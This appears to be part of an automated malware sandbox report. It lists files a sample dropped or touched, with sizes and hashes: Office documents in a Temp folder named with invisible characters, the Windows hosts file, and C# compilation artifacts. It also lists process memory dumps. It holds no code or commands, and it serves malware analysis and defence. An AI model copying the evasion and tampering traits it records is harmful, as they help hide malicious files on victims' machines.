b99133e81ddab461cece1562661cc980650b666a30d98c0f2be7fe9134199f6837684f8b629875444286a6b00fa05872f765ef06133c2b39744f042fd10107f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍  ‎‌ \Common Files\Desktop\SetInitialize.xlsx

Filesize
11KB

MD5
2a15107e65e7d7e8c078da825ec7d898

SHA1
2f93880e0b3e3c0c5778c34b35bafea45e4a7a84

SHA256
e4f3cd9f23f6ac3018ece8c7147c9f5a00262957c5545226b77977aa47536ee2

SHA512
4942a86d222d13e8cc476634a141fe32a201fcc1cfd8e4c064a51768ffae6514db99c507695c400ffcce945b09ddd724265600fed88af8e628705b8a12a07d12

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍  ‎‌ \Common Files\Documents\AssertNew.docx

Filesize
17KB

MD5
5b2a88926ffeea661f23e56d9f68b59c

SHA1
d6466a00058b8c4cd227c73179fe8c5bab33dc20

SHA256
5e4826cbffb134ed82b899d4e891943c91b90175ab32d7ff4d5119b118ab89a1

SHA512
9e165b1133b810f30d6ce6ae65cf39600e9c7d548687145e58d8f18fde6fba93921bbadd18889b77d6a4b94d68ecb49542c1ca3986be2aaee1b62638efe99910

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍  ‎‌ \Common Files\Documents\CompressExit.doc

Filesize
680KB

MD5
04d268000f3629824f5f04572a08f111

SHA1
d0ada080b2e157124f459d1d2fdb051a143f84b0

SHA256
f4836d88fc383571088c60534d4348bb2bab847139781b6343fe665a24487b15

SHA512
fba0be35cfc7abb2fbd9c4238bee5ee4829ad3b3ba01326b61bbd1dc02255109b8caacf21f623def887a07139e3fc04dca9120f2611245163f6f32db069bb08a

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hikqkjze\CSCE4B119D3B704330884AE27274F64E77.TMP

Filesize
652B

MD5
9898739613ef11ae8a2bc61f3d4ff743

SHA1
5c1bc111c8d3dd13c801883db007ae9b0e62d65f

SHA256
114f1584f129490b5f5605eb100c540dc1722ad9bcf9ac0aaba823f24201823d

SHA512
1b2f15c56f85e40cdde09e8a4ce3b801ba73944c2094f7ed2773091a7804a758c4ca8c2e183b41897e57454bcd20137f61f939983359661d34a4d78b88ec100c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hikqkjze\hikqkjze.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hikqkjze\hikqkjze.cmdline

Filesize
607B

MD5
503313b6db488cb644bb65a2bcb3a03f

SHA1
6de8aeaef1cdf8bfbb3d8ef65d596863183e56c8

SHA256
81a5c0bef7b6a17957af1711d43c328ca5adc2820db437ed197917a2c03e4af0

SHA512
8fdfc15579dbd6892237f8ad493fbb5d1e11f50cbb146ed2ce52ef2d493a480d44243965f26a97867c3972e4d1b4ccbcc99dc6ed55bae7ab5a3c6aeaad2b7588

Download Submit
memory/456-249-0x00007FFD9E780000-0x00007FFD9E7AE000-memory.dmp

Filesize
184KB

Download
memory/456-163-0x00007FFD9EE40000-0x00007FFD9EE59000-memory.dmp

Filesize
100KB

Download
memory/456-371-0x00007FFD8F3C0000-0x00007FFD8F530000-memory.dmp

Filesize
1.4MB

Download
memory/456-365-0x00007FFD8F530000-0x00007FFD8FB19000-memory.dmp

Filesize
5.9MB

Download
memory/456-265-0x000002C6B3060000-0x000002C6B33D5000-memory.dmp

Filesize
3.5MB

Download
memory/456-264-0x00007FFD8EC90000-0x00007FFD8F005000-memory.dmp

Filesize
3.5MB

Download
memory/456-726-0x00007FFDA4AD0000-0x00007FFDA4AF4000-memory.dmp

Filesize
144KB

Download
memory/456-743-0x00007FFD9EE60000-0x00007FFD9EE83000-memory.dmp

Filesize
140KB

Download
memory/456-748-0x00007FFD97BB0000-0x00007FFD97C68000-memory.dmp

Filesize
736KB

Download
memory/456-749-0x00007FFD8EC90000-0x00007FFD8F005000-memory.dmp

Filesize
3.5MB

Download
memory/456-747-0x00007FFD9E780000-0x00007FFD9E7AE000-memory.dmp

Filesize
184KB

Download
memory/456-746-0x00007FFD9FC10000-0x00007FFD9FC1D000-memory.dmp

Filesize
52KB

Download
memory/456-745-0x00007FFD9EE40000-0x00007FFD9EE59000-memory.dmp

Filesize
100KB

Download
memory/456-744-0x00007FFD8F3C0000-0x00007FFD8F530000-memory.dmp

Filesize
1.4MB

Download
memory/456-742-0x00007FFD9EFB0000-0x00007FFD9EFC9000-memory.dmp

Filesize
100KB

Download
memory/456-741-0x00007FFD9EFD0000-0x00007FFD9EFFD000-memory.dmp

Filesize
180KB

Download
memory/456-740-0x00007FFDA4A00000-0x00007FFDA4A0F000-memory.dmp

Filesize
60KB

Download
memory/456-739-0x00007FFD8EB70000-0x00007FFD8EC8C000-memory.dmp

Filesize
1.1MB

Download
memory/456-738-0x00007FFD9F790000-0x00007FFD9F79D000-memory.dmp

Filesize
52KB

Download
memory/456-737-0x00007FFD9EE20000-0x00007FFD9EE34000-memory.dmp

Filesize
80KB

Download
memory/456-725-0x00007FFD8F530000-0x00007FFD8FB19000-memory.dmp

Filesize
5.9MB

Download
memory/456-263-0x00007FFD97BB0000-0x00007FFD97C68000-memory.dmp

Filesize
736KB

Download
memory/456-25-0x00007FFD8F530000-0x00007FFD8FB19000-memory.dmp

Filesize
5.9MB

Download
memory/456-366-0x00007FFDA4AD0000-0x00007FFDA4AF4000-memory.dmp

Filesize
144KB

Download
memory/456-143-0x00007FFD8F3C0000-0x00007FFD8F530000-memory.dmp

Filesize
1.4MB

Download
memory/456-103-0x00007FFD9EE60000-0x00007FFD9EE83000-memory.dmp

Filesize
140KB

Download
memory/456-30-0x00007FFDA4AD0000-0x00007FFDA4AF4000-memory.dmp

Filesize
144KB

Download
memory/456-70-0x00007FFD8F530000-0x00007FFD8FB19000-memory.dmp

Filesize
5.9MB

Download
memory/456-72-0x00007FFD8EC90000-0x00007FFD8F005000-memory.dmp

Filesize
3.5MB

Download
memory/456-76-0x00007FFD9EE20000-0x00007FFD9EE34000-memory.dmp

Filesize
80KB

Download
memory/456-78-0x00007FFD9F790000-0x00007FFD9F79D000-memory.dmp

Filesize
52KB

Download
memory/456-82-0x00007FFD9EFB0000-0x00007FFD9EFC9000-memory.dmp

Filesize
100KB

Download
memory/456-83-0x00007FFD8EB70000-0x00007FFD8EC8C000-memory.dmp

Filesize
1.1MB

Download
memory/456-73-0x000002C6B3060000-0x000002C6B33D5000-memory.dmp

Filesize
3.5MB

Download
memory/456-74-0x00007FFDA4AD0000-0x00007FFDA4AF4000-memory.dmp

Filesize
144KB

Download
memory/456-71-0x00007FFD97BB0000-0x00007FFD97C68000-memory.dmp

Filesize
736KB

Download
memory/456-66-0x00007FFD9E780000-0x00007FFD9E7AE000-memory.dmp

Filesize
184KB

Download
memory/456-64-0x00007FFD9FC10000-0x00007FFD9FC1D000-memory.dmp

Filesize
52KB

Download
memory/456-62-0x00007FFD9EE40000-0x00007FFD9EE59000-memory.dmp

Filesize
100KB

Download
memory/456-60-0x00007FFD8F3C0000-0x00007FFD8F530000-memory.dmp

Filesize
1.4MB

Download
memory/456-58-0x00007FFD9EE60000-0x00007FFD9EE83000-memory.dmp

Filesize
140KB

Download
memory/456-56-0x00007FFD9EFB0000-0x00007FFD9EFC9000-memory.dmp

Filesize
100KB

Download
memory/456-54-0x00007FFD9EFD0000-0x00007FFD9EFFD000-memory.dmp

Filesize
180KB

Download
memory/456-48-0x00007FFDA4A00000-0x00007FFDA4A0F000-memory.dmp

Filesize
60KB

Download
memory/3728-89-0x000001F050EC0000-0x000001F050EE2000-memory.dmp

Filesize
136KB

Download
memory/4580-186-0x00000260F9B30000-0x00000260F9B38000-memory.dmp

Filesize
32KB

Download